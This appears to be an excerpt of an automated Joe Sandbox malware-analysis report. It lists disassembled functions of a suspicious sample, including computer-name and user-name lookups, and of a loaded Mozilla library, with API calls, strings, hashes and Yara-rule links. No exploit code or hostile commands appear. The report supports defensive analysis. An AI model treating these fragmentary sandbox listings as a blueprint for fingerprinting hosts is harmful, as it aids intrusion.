Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 1d985bd6e4ff3711618f4194db604f7bd069c981afdacedbe68322af171d0bdd
Instruction ID: 673bb072be5189656ba2468ac725f43955f9a54c47c8e1f5c9fe6b760bfc8937
Opcode Fuzzy Hash: 1d985bd6e4ff3711618f4194db604f7bd069c981afdacedbe68322af171d0bdd
Instruction Fuzzy Hash: BCE01231A4035C7BDB51DB94DC96FAD777CEB44B01F004295BA0C9A1C0DE70AB858B92

Function 00811190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 008278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827910
Part of subcall function 008278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00827917
Part of subcall function 008278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0082792F

Part of subcall function 00827850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008111B7), ref: 00827880
Part of subcall function 00827850: RtlAllocateHeap.NTDLL(00000000), ref: 00827887
Part of subcall function 00827850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0082789F

ExitProcess.KERNEL32 ref: 008111C6

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: a42e4d6126f13d41fd492017d790fdd1eb4647618e1dd0a92c10373b3bdffe64
Instruction ID: ae32951354eeb9c442a92713f0840a3853894a27e230ee6b7d88f49666013b2f
Opcode Fuzzy Hash: a42e4d6126f13d41fd492017d790fdd1eb4647618e1dd0a92c10373b3bdffe64
Instruction Fuzzy Hash: 31E012B5E1431163CE00B3F9BC0BB2A369CFB24346F040524FA05D2102FE25E881856F

Function 00828E30 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 00828E52

Memory Dump Source

Source File: 00000000.00000002.2320615612.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.2320593893.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000086A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.0000000000898000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000008FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2320615612.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000A6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000BF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000CF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321062923.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321377054.0000000000D11000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321580502.0000000000EB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2321597503.0000000000EB1000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: bc662def8b5cebbf3773a865a59ff01eab6f24999e2496abf9d303f298c2a30a
Instruction ID: 56d66dff03fdbe69ac7380b52b1be9d9b9f18910a6da6d5f24952cbc78c2574c
Opcode Fuzzy Hash: bc662def8b5cebbf3773a865a59ff01eab6f24999e2496abf9d303f298c2a30a
Instruction Fuzzy Hash: 8F01E438A05218EBCF04CF98D585BACBBB1FF04308F688088E905AB390C7756A94DB85

Non-executed Functions

Function 6C665440 Relevance: 138.8, APIs: 54, Strings: 25, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C665492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6654A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6654BE
__Init_thread_footer.LIBCMT ref: 6C6654DB

Part of subcall function 6C68AB3F: EnterCriticalSection.KERNEL32(6C6DE370,?,?,6C653527,6C6DF6CC,?,?,?,?,?,?,?,?,6C653284), ref: 6C68AB49
Part of subcall function 6C68AB3F: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C653527,6C6DF6CC,?,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68AB7C

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

GetCurrentThreadId.KERNEL32 ref: 6C6654F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C665516
GetCurrentThreadId.KERNEL32 ref: 6C66556A
AcquireSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C665577
moz_xmalloc.MOZGLUE(00000070), ref: 6C665585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C665590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C6655E6
ReleaseSRWLockExclusive.KERNEL32(6C6DF4B8), ref: 6C665606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C665616

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

GetCurrentThreadId.KERNEL32 ref: 6C66563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C665646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C66567C
free.MOZGLUE(?), ref: 6C6656AE

Part of subcall function 6C675E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C675EDB
Part of subcall function 6C675E90: memset.VCRUNTIME140(ewkl,000000E5,?), ref: 6C675F27
Part of subcall function 6C675E90: LeaveCriticalSection.KERNEL32(?), ref: 6C675FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C6656E8
GetCurrentThreadId.KERNEL32 ref: 6C665707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C66570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C665729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C66574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C66576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C665796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C6657B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C6657CA

Strings

[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C66584E
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C665BBE
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C6656E3
[I %d/%d] profiler_init, xrefs: 6C66564E
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C665AC9
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C665791
GeckoMain, xrefs: 6C665554, 6C6655D5
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C665B38
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C6657AE
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C665C56
MOZ_BASE_PROFILER_HELP, xrefs: 6C665511
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C66548D
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C665724
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C665766
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C665D24
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6654A3
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C665D2B
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6657C5
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C665D1C
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C665749
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C665D01
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C665CF9
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C665717
MOZ_PROFILER_STARTUP, xrefs: 6C6655E1
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6654B9

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: 9723cfc490d2767776d13f6d4db7c8a092534f89ff03e26e62870104a5c6f412
Instruction ID: 177a8c64f2d46a8a752f75fa61e52c8de68fafea378d92d8cf6f77fefddd9d63
Opcode Fuzzy Hash: 9723cfc490d2767776d13f6d4db7c8a092534f89ff03e26e62870104a5c6f412
Instruction Fuzzy Hash: 2D2205709043419FDB009F76C89666ABBB5AF8734CF04462AE94A87F42EB31E445CB5F

Function 6C666C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C666CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C666D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C666D26

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C666D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C666D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C666D73
free.MOZGLUE(00000000), ref: 6C666D80
CertGetNameStringW.CRYPT32 ref: 6C666DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C666DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C666DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C666DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C666E10
CryptMsgClose.CRYPT32(00000000), ref: 6C666E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C666E34
CreateFileW.KERNEL32 ref: 6C666EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C666F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C666F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C66709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C667103
free.MOZGLUE(00000000), ref: 6C667153
CloseHandle.KERNEL32(?), ref: 6C667176
__Init_thread_footer.LIBCMT ref: 6C667209
__Init_thread_footer.LIBCMT ref: 6C66723A
__Init_thread_footer.LIBCMT ref: 6C66726B
__Init_thread_footer.LIBCMT ref: 6C66729C
__Init_thread_footer.LIBCMT ref: 6C6672DC
__Init_thread_footer.LIBCMT ref: 6C66730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6673C2
VerSetConditionMask.NTDLL ref: 6C6673F3
VerSetConditionMask.NTDLL ref: 6C6673FF
VerSetConditionMask.NTDLL ref: 6C667406
VerSetConditionMask.NTDLL ref: 6C66740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C66741A
moz_xmalloc.MOZGLUE(?), ref: 6C66755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C667568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C667585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C667598
free.MOZGLUE(00000000), ref: 6C6675AC

Part of subcall function 6C68AB89: EnterCriticalSection.KERNEL32(6C6DE370,?,?,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284), ref: 6C68AB94
Part of subcall function 6C68AB89: LeaveCriticalSection.KERNEL32(6C6DE370,?,6C6534DE,6C6DF6CC,?,?,?,?,?,?,?,6C653284,?,?,6C6756F6), ref: 6C68ABD1

Strings

CryptCATAdminReleaseCatalogContext, xrefs: 6C6672C8
wintrust.dll, xrefs: 6C6672CD
(, xrefs: 6C66768A
SHA256, xrefs: 6C666EC0

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 7fc89b314fb4aa2afe388c52032a03451903b56d09fef3437752505b54f425da
Instruction ID: 66a7cec88e3af785e2294924bd49185265c2d8ef4da158a834f2fe8299d93b89
Opcode Fuzzy Hash: 7fc89b314fb4aa2afe388c52032a03451903b56d09fef3437752505b54f425da
Instruction Fuzzy Hash: 9852E871A042149FEB21DF26CC84BAA77B8EF46704F144599E909A7A40DB70BF84CF5A

Function 6C690DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C690F1F
LeaveCriticalSection.KERNEL32(?), ref: 6C690F99
memcpy.VCRUNTIME140(?,?,?), ref: 6C690FB7
EnterCriticalSection.KERNEL32(?), ref: 6C690FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C691031
LeaveCriticalSection.KERNEL32(?), ref: 6C6910D0
EnterCriticalSection.KERNEL32(?), ref: 6C69117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6C691C39
EnterCriticalSection.KERNEL32(6C6DE744), ref: 6C693391
LeaveCriticalSection.KERNEL32(6C6DE744), ref: 6C6933CD
LeaveCriticalSection.KERNEL32(?), ref: 6C693431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C693437

Strings

MALLOC_OPTIONS, xrefs: 6C6935FE
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6937A8
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C693793
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C693559, 6C69382D, 6C693848
Compile-time page size does not divide the runtime one., xrefs: 6C693946
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6937D2
<jemalloc>, xrefs: 6C693941, 6C6939F1
MOZ_CRASH(), xrefs: 6C693950
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6937BD
: (malloc) Unsupported character in malloc options: ', xrefs: 6C693A02

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: 490fd3e4da68b349dcf174aeb13f7e1aa5eb04aedbdc4e08c90c6a630371fe5e
Instruction ID: 96dae9f6c816b0358c2a12f1448292288e71a0c622159dc55be4494e21494cd5
Opcode Fuzzy Hash: 490fd3e4da68b349dcf174aeb13f7e1aa5eb04aedbdc4e08c90c6a630371fe5e
Instruction Fuzzy Hash: 1F539E71A057028FD704CF29C580616FBE1BF8A328F29C76DE8699B791D771E842CB85

Function 6C6B34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B3EE2

Part of subcall function 6C6B6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6B61DD
Part of subcall function 6C6B6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C6B622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4157

Part of subcall function 6C6B6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C6B6250
Part of subcall function 6C6B6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6B6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6B4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6B4896
free.MOZGLUE ref: 6C6B489F

Strings

, xrefs: 6C6B4CD2

Memory Dump Source

Source File: 00000000.00000002.2345894330.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2345865380.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345964121.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2345987874.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2346010530.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: 401fd3e3f0ce69e40bd11e1cc5dbf2f34b948666a2131da8147521809414bbb2
Instruction ID: 58ee6da397fa28b9ce1d1355d0b4e0bc2cd33d329d9bb7f3149907bc63987aa2
Opcode Fuzzy Hash: 401fd3e3f0ce69e40bd11e1cc5dbf2f34b948666a2131da8147521809414bbb2
Instruction Fuzzy Hash: 3CF26C74908B808FC725CF29C08469AFBF1FFCA304F118A5ED99997711DB71A896CB46

Function 6C6664C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

